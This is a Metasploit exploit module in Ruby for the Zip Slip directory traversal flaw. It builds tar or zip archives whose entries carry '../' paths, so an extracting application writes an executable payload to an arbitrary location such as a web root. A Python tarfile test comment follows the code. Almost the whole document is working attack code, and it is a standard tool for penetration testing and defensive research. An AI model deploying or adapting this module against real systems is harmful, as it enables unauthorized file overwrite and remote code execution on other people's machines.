Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
require 'rex/zip'
7

8
class MetasploitModule < Msf::Exploit::Remote
9
  Rank = ManualRanking
10

11
  include Msf::Exploit::FILEFORMAT
12
  include Msf::Exploit::EXE
13

14
  def initialize(info = {})
15
    super(
16
      update_info(
17
        info,
18
        'Name' => 'Generic Zip Slip Traversal Vulnerability',
19
        'Description' => %q{
20
          This is a generic arbitrary file overwrite technique, which typically results in remote
21
          command execution. This targets a simple yet widespread vulnerability that has been
22
          seen affecting a variety of popular products including HP, Amazon, Apache, Cisco, etc.
23
          The idea is that often archive extraction libraries have no mitigations against
24
          directory traversal attacks. If an application uses it, there is a risk when opening an
25
          archive that is maliciously modified, and result in the embedded payload to be written
26
          to an arbitrary location (such as a web root), and result in remote code execution.
27
        },
28
        'License' => MSF_LICENSE,
29
        'Author' =>
30
          [
31
            'Snyk', # Technique discovery
32
            'sinn3r', # Metasploit
33
            'ggkitsas'
34
          ],
35
        'References' =>
36
          [
37
            ['URL', 'https://snyk.io/research/zip-slip-vulnerability']
38
          ],
39
        'DefaultOptions' =>
40
          {
41
            'EXITFUNC' => 'thread',
42
            'DisablePayloadHandler' => true
43
          },
44
        'Platform' => ['linux', 'win', 'unix'],
45
        'Targets' =>
46
          [
47
            ['Manually determined', {}]
48
          ],
49
        'Privileged' => false,
50
        'DisclosureDate' => '2018-06-05'
51
      )
52
    )
53

54
    register_options([
55
      OptString.new('FILENAME', [true, 'The name of the archive file', 'msf.tar']),
56
      OptEnum.new('FTYPE', [true, 'The archive type', 'tar', ['tar', 'zip'] ]),
57
      OptString.new('TARGETPAYLOADPATH', [true, 'The targeted path for payload', '../payload.bin'])
58
    ])
59
  end
60

61
  class ZipSlipArchive
62
    attr_reader :data
63
    attr_reader :fname
64
    attr_reader :payload
65
    attr_reader :type
66

67
    def initialize(n, p, t)
68
      @fname = n
69
      @payload = p
70
      @type = t
71
      @data = make
72
    end
73

74
    def make
75
      data = ''
76
      path = Rex::FileUtils.normalize_unix_path(fname)
77

78
      if type == 'tar'
79
        contents = StringIO.new
80
        Rex::Tar::Writer.new(contents) do |t|
81
          t.add_file(path, 0o777) do |f|
82
            f.write(payload)
83
          end
84
        end
85
        contents.seek(0)
86
        data = contents.read
87
        contents.close
88
        data
89
      elsif type == 'zip'
90
        zip = Rex::Zip::Archive.new
91
        zip.add_file(path, payload)
92
        data = zip.pack
93
      end
94
    end
95
  end
96

97
  def make_archive(target_payload_path, type)
98
    elf = generate_payload_exe(code: payload.encoded)
99
    archive = ZipSlipArchive.new(target_payload_path, generate_payload_exe, type)
100
    archive.make
101
  end
102

103
  def exploit
104
    target_payload_path = datastore['TARGETPAYLOADPATH']
105
    unless target_payload_path.match(%r{\.\./})
106
      print_error('Please set a traversal path')
107
      return
108
    end
109

110
    archive = make_archive(target_payload_path, datastore['FTYPE'])
111
    file_create(archive)
112
    print_status('When extracted, the payload is expected to extract to:')
113
    print_status(target_payload_path)
114
  end
115
end
116

117
# A quick test:
118
#
119
# $ python
120
# >>> import tarfile
121
# >>> t = tarfile.open('test.tar')
122
# >>> t.extractall()
123
# >>> exit()
124
#
125

126